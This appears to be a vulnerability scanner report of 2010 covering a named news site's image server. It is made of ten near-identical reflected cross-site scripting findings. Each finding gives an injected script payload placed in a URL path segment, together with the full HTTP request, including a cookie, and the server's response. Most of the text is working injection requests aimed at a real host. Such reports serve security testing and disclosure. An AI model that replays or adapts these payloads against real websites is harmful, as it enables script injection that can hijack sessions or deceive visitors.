The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5773a<script>alert(1)</script>97d88415c32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/115773a<script>alert(1)</script>97d88415c32/08/90x90-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:41 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 44db9<script>alert(1)</script>ca5419341cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0844db9<script>alert(1)</script>ca5419341cb/90x90-alg_resize_nyc-marathon_gebre.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:25 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4198b<script>alert(1)</script>5eb9e71c9b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img4198b<script>alert(1)</script>5eb9e71c9b0/2010/11/08/90x90-vthmb_celebrityfit.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:46 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d4df<script>alert(1)</script>2e36ab38a3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20104d4df<script>alert(1)</script>2e36ab38a3f/11/08/90x90-vthmb_celebrityfit.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:28 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91a84<script>alert(1)</script>5e4885b6d24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1191a84<script>alert(1)</script>5e4885b6d24/08/90x90-vthmb_celebrityfit.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:36 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85987<script>alert(1)</script>a4136c60294 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/0885987<script>alert(1)</script>a4136c60294/90x90-vthmb_celebrityfit.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:44 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bc8e<script>alert(1)</script>d339fb0d7d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img4bc8e<script>alert(1)</script>d339fb0d7d5/2010/11/08/90x90-vthmb_nyc-marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:43 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9434d<script>alert(1)</script>26a34d49268 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20109434d<script>alert(1)</script>26a34d49268/11/08/90x90-vthmb_nyc-marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:49 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbf91<script>alert(1)</script>86bf7fb75da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11dbf91<script>alert(1)</script>86bf7fb75da/08/90x90-vthmb_nyc-marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:32 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2bcb1<script>alert(1)</script>02c235691bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/082bcb1<script>alert(1)</script>02c235691bd/90x90-vthmb_nyc-marathon.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:06:39 GMT Server: Apache Content-Length: 104 nnCoection: close Content-Type: text/html Content-Language: en Connection: close